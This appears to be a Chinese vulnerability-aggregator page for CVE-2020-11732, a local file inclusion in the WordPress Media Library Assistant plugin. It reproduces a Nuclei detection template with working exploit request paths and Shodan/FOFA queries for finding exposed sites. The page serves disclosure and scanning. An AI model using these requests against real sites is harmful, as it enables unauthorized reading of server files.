CVE-2020-11732: Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion

日期: 2025-12-02 | 影响软件: Media Library Assistant | POC: 已公开

漏洞描述

Media Library Assistant plugin for WordPress before 2.82 contains a local file inclusion caused by unsanitized mla_gallery link parameter, letting attackers include arbitrary local files, exploit requires access to the vulnerable link.

PoC代码[已公开]

id: CVE-2020-11732

info:
  name: Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion
  author: Sourabh-Sahu
  severity: high
  description: |
    Media Library Assistant plugin for WordPress before 2.82 contains a local file inclusion caused by unsanitized mla_gallery link parameter, letting attackers include arbitrary local files, exploit requires access to the vulnerable link.
  impact: |
    Attackers can include arbitrary local files, potentially leading to information disclosure or code execution.
  remediation: |
    Update to version 2.82 or later.
  reference:
    - https://wpscan.com/vulnerability/80d60584-fa03-407e-a7bd-32d507a1046d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-11732
    epss-score: 0.3478
    epss-percentile: 0.96849
    cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: davidlingren
    product: media_library_assistant
    framework: wordpress
    fofa-query: body="wp-content/plugins/media-library-assistant"
    publicwww-query: "/wp-content/plugins/media-library-assistant/"
    shodan-query: http.html:"wp-content/plugins/media-library-assistant"
  tags: wpscan,cve,cve2020,wordpress,wp,wp-plugin,media-library-assistant,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php"
      - "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wp-content/index.php"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '// Silence is golden.')"
        condition: and
# digest: 490a00463044022050740b81f8e23c452d00fdb3c0c0a36c0a1a0f57e527e936a0e5876115e1cfca02204d96d0582124e49da8436fc9a9e13d6d2e4d307cf646e4783cf9247116d195e1:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11732.yaml

相关漏洞推荐